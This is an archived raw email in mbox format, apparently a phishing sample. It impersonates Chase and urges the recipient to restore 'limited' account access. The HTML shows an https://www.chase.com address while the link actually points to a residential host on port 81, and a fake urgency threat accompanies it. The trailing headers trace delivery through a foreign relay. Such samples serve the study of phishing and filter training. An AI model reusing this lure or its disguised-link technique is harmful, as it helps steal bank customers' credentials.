From: "Chase" <support@chase.com>
Reply-To: "Chase" <support@chase.com>
To: dugsong@example.com, nobody@example.com, emv@example.com
Subject: Reactivate Your Chase Account
Date: Sun, 02 Apr 2006 10:31:04 -0300
X-Mailer: MIME-tools 5.503 (Entity 5.501)
MIME-Version: 1.0
Content-Type: multipart/alternative;
	boundary="--7024784998918872165"
X-Priority: 1
X-MSMail-Priority: High
Content-Length: 1954
Lines: 50
Status: O
X-Status: 
X-Keywords:                  
X-UID: 721

----7024784998918872165
Content-Type: text/html;
Content-Transfer-Encoding: quoted-printable

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www=
w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns=3D"http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv=3D"Content-Type" content=3D"text/html; charset=3Diso-8859=
-1" />
<title>Untitled Document</title>
</head>

<body>
<table width=3D"673" border=3D"0">
  <tr>
    <td><div align=3D"right"><a href=3D"http://cpe-24-221-82-147.mi.sprint=
bbd.net:81/colappmgr/" target=3D"_blank"><img src=3D"http://www.chase.com/=
ccpmweb/shared/image/chaseNewlogo.gif" width=3D"138" height=3D"27" border=3D=
"0" /></a></div></td>
  </tr>
</table>
<table width=3D"673" height=3D"232" border=3D"0">
  <tr>
    <td><p>Your online credit card account has high-risk activity status. =
We are contacting you to remind that on March 31 2006 our Account Review T=
eam identified some unusual activity in your account. In accordance with C=
hase Bank User Agreement and to ensure that your account has not been comp=
romised, access your account was limited. Your account access will remain =
limited until this issue has been resolved.</p>
    <p>We encourage you to log in and perform the steps necessary to resto=
re your account access as soon as possible. Allowing your account access t=
o remain limited for an extended period of time may result in further limi=
tations on the use of your account and possible account closure.<br />
    </p>
    <p>Login to your limit account and restore online access:<br />
      <a href=3D"http://cpe-24-221-82-147.mi.sprintbbd.net:81/colappmgr/" =
target=3D"_blank">https://www.chase.com/asp/services/update.php?account313=
985</a></p>
    <p>This notification is part of the All-Electronic Program you enrolle=
d in to receive your activity report online.<br />
    </p></td>
  </tr>
</table>
<p>&nbsp;</p>
</body>
</html>


----7024784998918872165--

From memberservice@chase.com  Sun Apr  2 10:21:56 2006
Return-Path: <memberservice@chase.com>
X-Original-To: nobody@login.example.com
Delivered-To: nobody@login.example.com
Received: from mail1.example.com (mail1.example.com [10.5.6.7])
	by naughty.example.com (Postfix) with ESMTP id B69F9536E2E
	for <nobody@login.example.com>; Sun,  2 Apr 2006 10:21:56 -0400 (EDT)
Received: from mail.mirle.cn (unknown [211.136.186.30])
	by mail1.example.com (Postfix) with ESMTP id 1C8C06CCF1E
	for <nobody@example.com>; Sun,  2 Apr 2006 05:35:35 -0400 (EDT)
Received: from User ([84.36.208.149])
	(authenticated bits=0)
	by mail.mirle.cn (8.12.10/8.12.10) with ESMTP id k32DwR0F030066;
	Sun, 2 Apr 2006 21:58:30 +0800
Message-Id: <200604021358.k32DwR0F030066@mail.mirle.cn>
